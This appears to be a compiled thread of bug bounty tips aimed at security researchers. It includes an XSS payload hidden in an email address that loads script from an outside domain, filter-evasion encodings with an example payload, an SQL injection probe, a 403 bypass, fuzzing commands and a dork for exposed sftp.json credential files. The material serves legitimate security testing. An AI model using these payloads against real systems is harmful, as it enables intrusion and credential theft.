If you are trying to access an endpoint and get 403
try this
/api/docs/index.html ==> 403 Forbidden
/api/Docs/index.html ==> 200 Ok

By:Zayed 🇵🇸

#BugBounty #bugbountytips

Top 5 places to look for SSRF vulnerabilities: 😎

• Profile image loaders
• External file or data processors (like webhooks)
• PDF Generators (through HTML Injection)
• Host header injections
• File uploads (via XML for example)

By:Intigriti

#bugbounty tips #bugbounty

A list of companies that accept responsible disclosure
bug-bounties.as93.net

#bugbounty tips #bugbounty

Server Side Template Injection

Credit:Coffin

#bugbounty tips #bugbounty

XSS in an email address is underrated. (email is rarely sanitized by companies).Use catch-all and then you can also verify your account (if required).

'><img/src/onerror=import('//domain/')>'@yourdomain
.com

cc Brute Logic

brutelogic.com.br/blog/xss-limit…

#bugbounty tips #bugbounty

Shortscan is designed to quickly determine which files with short filenames exist on an IIS webserver.
github.com/bitquark/short…

#BugBounty #bugbountytips

Open Redirect Bypasses

Credit:Brut 🇮🇳

#bugbounty tips #bugbounty

SQL Injection to Account Takeover Manually :)
1. Enter mobile number to login intercept
{'mobile_number':'8888888888'} >> 200
{'mobile_number':'8888888888''} >> 500
{'mobile_number':'8888888888'''} >> 200

credit: BBR - Bug Bounty Resources 🧵

#bugbounty tips #bugbounty

Ffuf for parameter guessing by Otterly

ffuf -u 'https://target\.com/payment.php?FUZZ=regular' -w ~/wordlists/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt

#BugBounty #bugbountytips

When to hunt for Blind XSS

Credit:Coffin

#BugBounty #bugbountytips

XSS Oneliner by Coffin

#BugBounty #bugbountytips

NucleiScanner = Nuclei + Subfinder + Gau + Paramspider + httpx (Automation)

github.com/0xKayala/Nucle…

By:Satya Prakash 

#BugBounty #bugbountytips

Files Containing Juicy Info inurl:'/.vscode/sftp.json
By:bugscout

#BugBounty #bugbountytips

Wordpress endpoints by Coffin

#bugbounty tips #bugbounty

Dump URLs from sitemap.xml:

curl -s http://HOST/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'

Credit:Plxx

#BugBounty #bugbountytips

If you see android:exported='true' in AndroidManifest.xml in Android pentests, you should definitely try the intent injection method, this may give you ssrf, exfiltration sensitive data, rce.

Credit:𐰚𐰼𐰇𐱅

#BugBounty #bugbountytips

File upload checklist by Coffin

#BugBounty #bugbountytips

Basic XSS Encoding Tips

1) alert = window['al'+'ert']
2) bypass () with ``
3) replace space with /
4) encode symbols:

< = %3c
> = %3e
' = %22
[ = %5b
] = %5d
` = %60

Example Payload:
%3csvg/onload=window%5b'al'+'ert'%5d`1337`%3e
By:Sergio Medeiros

#BugBounty #bugbountytips